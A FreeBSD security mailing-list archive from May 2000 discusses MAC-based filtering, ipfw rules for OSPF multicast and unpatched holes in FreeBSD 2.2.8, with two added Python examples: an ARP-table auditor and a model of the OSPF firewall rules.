> windows boxes with a freebsd firewall, no policies on the computers and if
> possible I would like to implement this only on the firewall level. Anyone
> got any advice? Thanks.
> -Blake
>
> Blake Matheny
> Bussert Consulting
> Network Engineer
> (765)423-2100
> matheny@bussert.com

--
This program has been brought to you by the language C and the number F.

From owner-freebsd-security Mon May 22 11:11:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id C6A7737BC6B for ; Mon, 22 May 2000 11:11:12 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08655; Mon, 22 May 2000 13:40:32 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:40:32 -0500 (EST)
From: Blake Matheny To: Matthew Dillon Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules In-Reply-To: <200005221802.LAA61355@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Yeah, I'm worried that some windows users (that can read) :) might try to change the network settings, etc.

Blake Matheny
Bussert Consulting
Network Engineer
(765)423-2100
matheny@bussert.com

On Mon, 22 May 2000, Matthew Dillon wrote:
> :Is there a way to deny by mac address rather than ip address? I need to
> :deny a group of computers (with static ip's) access to the internet, but
> :if someone changes their ip (with DHCP) it doesn't do any good. These are
> :windows boxes with a freebsd firewall, no policies on the computers and if
> :possible I would like to implement this only on the firewall level. Anyone
> :got any advice? Thanks.
> :-Blake
> :
> :Blake Matheny
> :Bussert Consulting
> :Network Engineer
> :(765)423-2100
> :matheny@bussert.com
>
> You can set dhcp up to assign a specific IP address for a specific
> MAC address, would that be good enough or are you worried about
> the windows users screwing around with their network config?
>
> -Matt
> Matthew Dillon

From owner-freebsd-security Mon May 22 11:15:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id 2D0AB37BC77 for ; Mon, 22 May 2000 11:15:19 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08688; Mon, 22 May 2000 13:44:46 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:44:46 -0500 (EST)
From: Blake Matheny To: Andre Gironda Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules In-Reply-To: <20000522110814.A5867@toaster.sun4c.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I'm thinking of writing something that utilizes something like arpwatch to keep an eye on mac/ip address mappings. Then if a mac address changes ip it gets added to a list which is filtered by ipfw. Does anyone know of something like this or have any other suggestions?

Blake Matheny
Bussert Consulting
Network Engineer
(765)423-2100
matheny@bussert.com

From owner-freebsd-security Mon May 22 11:17: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id F37F037C12E for ; Mon, 22 May 2000 11:16:56 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA07269; Mon, 22 May 2000 12:16:39 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA96713; Mon, 22 May 2000 12:15:39 -0600 (MDT) Message-Id: <200005221815.MAA96713@harmony.village.org> To: cjclark@home.com Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 22 May 2000 14:02:32 EDT." <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> References: <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <200005220437.WAA92094@harmony.village.org> Date: Mon, 22 May 2000 12:15:39 -0600
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes:
: Should I be concerned about these "many vulnerabilities?" Where are
: they documented?

We stopped committing to make backports to 2.x when FreeBSD 3.2 was released, or about this time last year. Anything that happened after that may or may not have made it back to 2.2.8. Also, some of them weren't noteworthy at the time, so no advisory was issued (I had the advisory setting too high). Some exploits have surfaced against old versions of FreeBSD. There's no central collection of these documented anywhere. I wish I had a better answer for you than this.

Warner

From owner-freebsd-security Mon May 22 12:52:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from ms.securenet.net (ms.securenet.net [205.236.147.20]) by hub.freebsd.org (Postfix) with ESMTP id D3E1D37BBC7 for ; Mon, 22 May 2000 12:52:24 -0700 (PDT) (envelope-from vandj@securenet.net) Received: from notepad.securenet.net ([216.113.17.3]) by ms.securenet.net (8.10.1/8.10.1) with ESMTP id e4MJqKq95045 for ; Mon, 22 May 2000 15:52:20 -0400 (EDT) Message-Id: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> X-Sender: vandj@pop.securenet.net X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 15:50:30 -0400 To: freebsd-security@FreeBSD.ORG
From: "Jean M. Vandette" Subject: IPFW and OSPF Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Greetings all,

I was wondering if anyone could tell me what rule to put into the rc.firewall so ospf multicast updates will pass to the local servers. I've tried a few things without much success; any help would be appreciated.

Thanks in advance for any assistance.

Jean M. Vandette

From owner-freebsd-security Mon May 22 14:19:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from clavin.efn.org (clavin.efn.org [206.163.176.10]) by hub.freebsd.org (Postfix) with ESMTP id 8EC4B37BB8B for ; Mon, 22 May 2000 14:19:16 -0700 (PDT) (envelope-from bdeless@efn.org) Received: from garcia.efn.org (bdeless@garcia.efn.org [206.163.176.5]) by clavin.efn.org (8.10.1/8.10.1) with ESMTP id e4MLIux25116 for ; Mon, 22 May 2000 14:19:01 -0700 (PDT) Received: from localhost (bdeless@localhost) by garcia.efn.org (8.10.1/8.10.1) with ESMTP id e4MLIfh00141 for ; Mon, 22 May 2000 14:18:55 -0700 (PDT) X-Authentication-Warning: garcia.efn.org: bdeless owned process doing -bs Date: Mon, 22 May 2000 14:18:38 -0700 (PDT)
From: BD To: freebsd-security@freebsd.org Subject: Web Server and Xwindows Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I currently run a web site on a 4.0 box using the current version of Apache. I must confess a desire to install X(w/KDE) now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. Stateful packet filtering only allows 80,443,25,110-all with wrappers. Is X still the security risk I've always been taught? Any thoughts or advice is appreciated.

Many Thanks,
Robert

From owner-freebsd-security Mon May 22 14:45:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from spike.brainlink.com (spike.brainlink.com [206.127.59.100]) by hub.freebsd.org (Postfix) with ESMTP id 4FB1637B5AE for ; Mon, 22 May 2000 14:45:32 -0700 (PDT) (envelope-from spork@spike.brainlink.com) Received: (from spork@localhost) by spike.brainlink.com (8.9.3/8.9.3) id RAA03230; Mon, 22 May 2000 17:44:01 -0400 (EDT) (envelope-from spork) Date: Mon, 22 May 2000 17:44:00 -0400
From: Spike Gronim To: Blake Matheny Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules Message-ID: <20000522174400.A3178@spike.brainlink.com> Reply-To: gronimw@stuy.edu References: <20000522110814.A5867@toaster.sun4c.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from matheny@bussert.com on Mon, May 22, 2000 at 01:44:46PM -0500 X-PGP-Public-Key: http://www.gronim.com/spike/pubkey.asc X-PGP-fingerprint: 05 92 88 05 3C DB F2 40 AB 1D AE 2A F0 E5 FA A5 X-Geek-Code: http://www.gronim.com/spike/geekcode Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, May 22, 2000 at 01:44:46PM -0500, Blake Matheny wrote:
> I'm thinking of writing something that utilizes something like arpwatch to
> keep an eye on mac/ip address mappings. Then if a mac address changes ip
> it gets added to a list which is filtered by ipfw. Does anyone know of
> something like this or have any other suggestions?

One problem I see with that is that I could maliciously change my IP to that of another machine and get it blocked from the net.

>
> Blake Matheny
> Bussert Consulting
> Network Engineer
> (765)423-2100
> matheny@bussert.com

--
--Spike Gronim gronimw@stuy.edu "Oh yes? An obscene triangle which, has more courage than the word."
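The MAC/IP monitor Blake sketches, written so that it is not open to the objection Spike raises. This is an added example, not code from anyone on the list: instead of adding whichever IP changed owner to an ipfw deny list (which lets a host that borrows a neighbour's IP get the neighbour cut off), it keeps a fixed allow-list of IP/MAC pairs and reports the listed MAC that moved or the listed IP that is now answered by a stranger. It assumes the FreeBSD `arp -an` line format `? (192.168.1.10) at 0:11:22:33:44:55 on fxp0 [ethernet]`; the ARP snapshot and the allow-list are constructed sample data.

```python
"""Audit a live ARP table against a fixed IP-to-MAC allow-list.

Added example (not from the thread). Assumes the FreeBSD `arp -an` output
format; the snapshot and the allow-list below are constructed sample data.
"""
import re
from typing import Dict, List, Tuple

# One `arp -an` entry; "(incomplete)" entries deliberately fail the MAC pattern.
ARP_LINE = re.compile(
    r"\?\s+\((?P<ip>[\d.]+)\)\s+at\s+(?P<mac>[0-9a-fA-F:]+)\s+on\s+(?P<iface>\S+)"
)

# Constructed allow-list: the only IP/MAC pairs that belong on this LAN.
ALLOW_LIST: Dict[str, str] = {
    "192.168.1.10": "00:11:22:33:44:55",
    "192.168.1.11": "00:11:22:33:44:56",
    "192.168.1.12": "00:11:22:33:44:57",
}

# Constructed `arp -an` snapshot: .11 is as expected, .10 is now answered by
# an unknown NIC, and the NIC that belongs to .12 has moved itself to .13.
SAMPLE_ARP = """\
? (192.168.1.1) at (incomplete) on fxp0 [ethernet]
? (192.168.1.10) at 0:aa:bb:cc:dd:ee on fxp0 [ethernet]
? (192.168.1.11) at 0:11:22:33:44:56 on fxp0 [ethernet]
? (192.168.1.13) at 0:11:22:33:44:57 on fxp0 [ethernet]
"""


def normalize_mac(mac: str) -> str:
    """Zero-pad each octet so 0:11:22:33:44:55 and 00:11:22:33:44:55 compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def parse_arp(text: str) -> Dict[str, str]:
    """Map IP -> normalized MAC for every complete entry in `arp -an` output."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


def audit(table: Dict[str, str], allow: Dict[str, str]) -> Tuple[
    List[Tuple[str, str, str]], List[Tuple[str, str, str]], List[Tuple[str, str]]
]:
    """Compare the live table with the allow-list.

    Returns (mismatched, moved, unknown):
      mismatched: (ip, expected_mac, seen_mac)  listed IP answered by the wrong NIC
      moved:      (mac, expected_ip, seen_ip)   listed NIC now using another IP
      unknown:    (ip, mac)                     neither the IP nor the MAC is listed
    The NIC is what gets named, so spoofing a neighbour's IP implicates the
    spoofer's own MAC rather than the neighbour's address.
    """
    allow_norm = {ip: normalize_mac(mac) for ip, mac in allow.items()}
    mac_to_ip = {mac: ip for ip, mac in allow_norm.items()}
    mismatched, moved, unknown = [], [], []
    for ip, mac in sorted(table.items()):
        if ip in allow_norm:
            if allow_norm[ip] != mac:
                mismatched.append((ip, allow_norm[ip], mac))
        elif mac in mac_to_ip:
            moved.append((mac, mac_to_ip[mac], ip))
        else:
            unknown.append((ip, mac))
    return mismatched, moved, unknown


if __name__ == "__main__":
    # On a real firewall the snapshot would come from `arp -an` run periodically.
    bad, moved, unknown = audit(parse_arp(SAMPLE_ARP), ALLOW_LIST)
    for ip, want, got in bad:
        print(f"MISMATCH {ip}: expected {want}, table has {got}")
    for mac, home, now in moved:
        print(f"MOVED    {mac}: allotted {home}, now claiming {now}")
    for ip, mac in unknown:
        print(f"UNKNOWN  {ip} at {mac}")
```

Feeding the output of a periodic `arp -an` (or an arpwatch log, once a parser for that format is substituted) into `audit` gives the list of offending NICs; what to do with a flagged MAC, whether to disable its switch port or drop its DHCP lease, is then a policy decision rather than an automatic ipfw rule keyed on an IP that anyone on the segment can claim.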
From owner-freebsd-security Mon May 22 15:55:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sneety.insync.net (sneety.insync.net [209.113.65.5]) by hub.freebsd.org (Postfix) with ESMTP id C61A237B63A for ; Mon, 22 May 2000 15:55:39 -0700 (PDT) (envelope-from dgailey@insync.net) Received: from hexidec (hstn-pri1-a44.txucom.net [209.34.59.44]) by sneety.insync.net (8.9.3/8.9.3) with SMTP id RAA21394; Mon, 22 May 2000 17:55:17 -0500 (CDT) Message-ID: <004001bfc441$2e135340$d72210d1@insync.net> From: "Dan Gailey" To: , "Jean M. Vandette" References: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> Subject: Re: IPFW and OSPF Date: Mon, 22 May 2000 17:57:53 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

try reading the RFC's?

-sincerely, dan.

----- Original Message -----
From: Jean M. Vandette To: Sent: Monday, May 22, 2000 2:50 PM Subject: IPFW and OSPF

> Greetings all,
>
> I was wondering if anyone could tell me what rule to put into
> the rc.firewall so ospf multicast updates will pass to the local
> servers. I've tried a few things without much success any help
> would be appreciated.
>
> Thanks in advance for any assistance.
>
> Jean M. Vandette

From owner-freebsd-security Mon May 22 16: 6:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 6AB6637B7A9 for ; Mon, 22 May 2000 16:06:50 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3+openldap/8.9.3) id QAA06151; Mon, 22 May 2000 16:09:07 -0700 (PDT) Date: Mon, 22 May 2000 16:09:06 -0700
From: Andre Gironda To: "Jean M. Vandette" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW and OSPF Message-ID: <20000522160906.B5867@toaster.sun4c.net> References: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net>; from Jean M. Vandette on Mon, May 22, 2000 at 03:50:30PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Uh... I think you might be able to do this with IPFW. I haven't done it myself.

According to /etc/protocols, OSPF is IP proto type 89. so like "ipfw add allow 89 from to " or just "ipfw add allow ospf from any to any" :>

but that's just the IGP, now you have to worry about passing LSA and Hellos... they run over Multicast (224.0.0.5 and 224.0.0.6) with TTL=1

So, you have multicast group 224.0.0.5 (all routers) and 224.0.0.6 (designated routers - DRs) that you need to allow (ipfw add allow all from 224.0.0.X to X). Make sure you use "all" or type 2 (IGMP).

Realize that this will only allow multicast to the local network (which is hopefully all you need) because of the multicast ttl=1 (see ip(4) for more information).

dre

On Mon, May 22, 2000 at 03:50:30PM -0400, Jean M. Vandette wrote:
> Greetings all,
>
> I was wondering if anyone could tell me what rule to put into
> the rc.firewall so ospf multicast updates will pass to the local
> servers. I've tried a few things without much success any help
> would be appreciated.
>
> Thanks in advance for any assistance.
>
> Jean M. Vandette

--
This program has been brought to you by the language C and the number F.
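The rule set Andre outlines, worked through as an added example that is not code from anyone on the list. ipfw itself is not run here: the equivalent `ipfw add` lines are given in a comment (with the multicast groups as the destination, which is how OSPF addresses its Hellos and LSAs), and a small first-match evaluator, modelling only protocol, source, destination and interface, shows which packets those rules admit and which they still drop. The interface names and the sample packets are constructed.

```python
"""Model of the ipfw rules that admit OSPF multicast on the LAN interface.

Added example (not from the thread). The evaluator is a simplified model of
ipfw's first-match semantics; the interface names and packets are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

OSPF = 89                        # /etc/protocols: ospf is IP protocol 89
IGMP = 2                         # /etc/protocols: igmp is IP protocol 2
UDP = 17
ALL_OSPF_ROUTERS = "224.0.0.5"   # every OSPF router joins this group
ALL_DR_ROUTERS = "224.0.0.6"     # designated / backup designated routers only


@dataclass
class Rule:
    action: str                 # "allow" or "deny"
    proto: Optional[int]        # None matches any IP protocol (ipfw "ip" / "all")
    src: str                    # "any", one address, or a prefix/len
    dst: str
    via: Optional[str] = None   # interface name; None matches any interface


@dataclass
class Packet:
    proto: int
    src: str
    dst: str
    iface: str


def addr_match(pattern: str, addr: str) -> bool:
    """ipfw-style address match: 'any', an exact address, or a CIDR prefix."""
    if pattern == "any":
        return True
    return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)


def matches(rule: Rule, pkt: Packet) -> bool:
    return (
        (rule.proto is None or rule.proto == pkt.proto)
        and addr_match(rule.src, pkt.src)
        and addr_match(rule.dst, pkt.dst)
        and (rule.via is None or rule.via == pkt.iface)
    )


def evaluate(rules: List[Rule], pkt: Packet) -> str:
    """First matching rule decides, as in ipfw; nothing matching means deny."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"


def ospf_rules(lan_if: str) -> List[Rule]:
    """Rules to place in rc.firewall ahead of its closing deny (assumed layout).

    Equivalent ipfw commands, with <lan_if> the interface the routers share:
        ipfw add allow ospf from any to 224.0.0.5 via <lan_if>
        ipfw add allow ospf from any to 224.0.0.6 via <lan_if>
        ipfw add allow igmp from any to 224.0.0.0/4 via <lan_if>
        ipfw add deny ip from any to any
    """
    return [
        Rule("allow", OSPF, "any", ALL_OSPF_ROUTERS, lan_if),
        Rule("allow", OSPF, "any", ALL_DR_ROUTERS, lan_if),
        Rule("allow", IGMP, "any", "224.0.0.0/4", lan_if),
        Rule("deny", None, "any", "any"),
    ]


# Constructed traffic: fxp0 is the LAN where the routers live, fxp1 the uplink.
SAMPLE_PACKETS: Dict[str, Packet] = {
    "ospf hello":       Packet(OSPF, "192.168.1.2", ALL_OSPF_ROUTERS, "fxp0"),
    "ospf to DRs":      Packet(OSPF, "192.168.1.2", ALL_DR_ROUTERS, "fxp0"),
    "igmp query":       Packet(IGMP, "192.168.1.1", "224.0.0.1", "fxp0"),
    "ospf from uplink": Packet(OSPF, "10.9.9.9", ALL_OSPF_ROUTERS, "fxp1"),
    "other multicast":  Packet(UDP, "192.168.1.2", "239.1.2.3", "fxp0"),
}


def classify(lan_if: str = "fxp0") -> Dict[str, str]:
    """Verdict for each sample packet under ospf_rules(lan_if)."""
    rules = ospf_rules(lan_if)
    return {name: evaluate(rules, pkt) for name, pkt in SAMPLE_PACKETS.items()}


if __name__ == "__main__":
    for name, verdict in classify().items():
        print(f"{name:18s} {verdict}")
```

The `via` qualifier is what keeps the opening narrow: OSPF arriving on the uplink and unrelated multicast on the LAN still hit the final deny, while the three allow rules pass only what the routers on that segment exchange. Note that ipfw's built-in last rule is a deny unless the kernel was built with `IPFIREWALL_DEFAULT_TO_ACCEPT`, so the explicit closing deny is there to make the model's behaviour independent of that option.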
From owner-freebsd-security Mon May 22 18:27: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id D2F6537B7AD for ; Mon, 22 May 2000 18:26:58 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id WAA02250; Mon, 22 May 2000 22:26:15 -0300 (GMT)
From: Fernando Schapachnik Message-Id: <200005230126.WAA02250@ns1.via-net-works.net.ar> Subject: Re: The procfs Hole in 2.2.8-STABLE? In-Reply-To: <200005221815.MAA96713@harmony.village.org> from Warner Losh at "May 22, 0 12:15:39 pm" To: imp@village.org (Warner Losh) Date: Mon, 22 May 2000 22:26:15 -0300 (GMT) Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In an earlier message, Warner Losh wrote:
> We stopped committing to make backports to 2.x when FreeBSD 3.2 was
> released, or about this time last year. Anything that happened after
> that may or may not have made it back to 2.2.8. Also, some of them
> weren't noteworthy at the time, so no advisory was issued (I had the
> advisory setting too high). Some exploits have surfaced against old
> versions of FreeBSD. There's no central collection of these
> documented anywhere. I wish I had a better answer for you than this.

Any of them is a remote exploit? Have an URL?

Thanks!

Fernando P. Schapachnik
Network Administration
VIA NET.WORKS ARGENTINA S.A.
fernando@via-net-works.net.ar
(54-11) 4323-3333

From owner-freebsd-security Mon May 22 18:41: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id A502337BB22 for ; Mon, 22 May 2000 18:41:00 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 29341 invoked from network); 23 May 2000 01:37:03 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 23 May 2000 01:37:03 -0000 To: freebsd-security@freebsd.org Subject: Re: Firewall Rules
From: sen_ml@eccosys.com In-Reply-To: <20000522110814.A5867@toaster.sun4c.net> References: <20000522110814.A5867@toaster.sun4c.net> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000523104053L.1001@eccosys.com> Date: Tue, 23 May 2000 10:40:53 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 18 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

From: Andre Gironda
Subject: Re: Firewall Rules
Date: Mon, 22 May 2000 11:08:14 -0700
Message-ID: <20000522110814.A5867@toaster.sun4c.net>

> If possible, you should try to segment off those users, because I don't
> think there is a way with IPF or IPFW (or any firewall that I can think
> of) to block MAC addresses specifically.

a bit off-topic remark...

not a bsd option, but iptables for linux has a module for filtering by mac address. if interested, have a look at the "other match extensions" section of:

http://netfilter.kernelnotes.org/iptables-HOWTO-7.html

back to our regularly scheduled program ;-)

From owner-freebsd-security Mon May 22 19:24:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8E9B537B64D for ; Mon, 22 May 2000 19:24:42 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id WAA37181; Mon, 22 May 2000 22:23:30 -0400 (EDT) (envelope-from cjc) Date: Mon, 22 May 2000 22:23:29 -0400
From: "Crist J. Clark" To: Andre Gironda Cc: Blake Matheny , freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules Message-ID: <20000522222329.C36986@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <20000522110814.A5867@toaster.sun4c.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000522110814.A5867@toaster.sun4c.net>; from andre@sun4c.net on Mon, May 22, 2000 at 11:08:14AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, May 22, 2000 at 11:08:14AM -0700, Andre Gironda wrote:
>
> Blake,
>
> If possible, you should try to segment off those users, because I don't
> think there is a way with IPF or IPFW (or any firewall that I can think
> of) to block MAC addresses specifically.

Wouldn't it be possible to essentially dev-null all but a fixed list of IP-MAC pairs? This would not be a deny list, but rather an accept list and then a default deny. That may or may not be acceptable.

I believe this can be done by turning off ARP on the interface and using arp(8) to build a static MAC-IP mapping of your own. Just a pretty easy to do idea.

> On Mon, May 22, 2000 at 01:08:30PM -0500, Blake Matheny wrote:
> > Is there a way to deny by mac address rather than ip address? I need to
> > deny a group of computers (with static ip's) access to the internet, but
> > if someone changes their ip (with DHCP) it doesn't do any good. These are
> > windows boxes with a freebsd firewall, no policies on the computers and if
> > possible I would like to implement this only on the firewall level. Anyone
> > got any advice? Thanks.
> > -Blake
> >
> > Blake Matheny
> > Bussert Consulting
> > Network Engineer
> > (765)423-2100
> > matheny@bussert.com

-- Crist J.
Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 20:32:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 73A3B37B53C; Mon, 22 May 2000 20:32:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA38694; Mon, 22 May 2000 20:32:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 22 May 2000 20:32:32 -0700 (PDT) 
From: Kris Kennaway To: Fernando Schapachnik Cc: Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? In-Reply-To: <200005230126.WAA02250@ns1.via-net-works.net.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 22 May 2000, Fernando Schapachnik wrote: > Any of them is a remote exploit? Have an URL? Read the security advisories at http://www.freebsd.org/security Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 20:45:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A664A37B854 for ; Mon, 22 May 2000 20:45:30 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA08938; Mon, 22 May 2000 21:45:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA99816; Mon, 22 May 2000 21:44:21 -0600 (MDT) Message-Id: <200005230344.VAA99816@harmony.village.org> To: Fernando Schapachnik Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 22 May 2000 22:26:15 -0300." <200005230126.WAA02250@ns1.via-net-works.net.ar> References: <200005230126.WAA02250@ns1.via-net-works.net.ar> Date: Mon, 22 May 2000 21:44:21 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200005230126.WAA02250@ns1.via-net-works.net.ar> Fernando Schapachnik writes: : In an earlier message, Warner Losh wrote: : > We stopped committing to make backports to 2.x when FreeBSD 3.2 was : > released, or about this time last year. Anything that happened after : > that may or may not have made it back to 2.2.8. Also, some of them : > weren't noteworthy at the time, so no advisory was issued (I had the : > advisory setting too high). Some exploits have surfaced against old : > versions of FreeBSD. There's no central collection of these : > documented anywhere. I wish I had a better answer for you than this. : : Any of them is a remote exploit? Have an URL? I don't think so. However, I can't say for sure. It has been a while since I've been focused on 2.x enough to know that all holes have been fixed. I just don't have the information that you want. Generally speaking, if the advisory doesn't mention the version of freebsd you are interested in, then the bug is likely still in that version. Also, there have been several DoS bugs that people have written exploits for after bugs were corrected in FreeBSD. Not all of these have had advisories since some of them have come along months or years after the bug fix. 
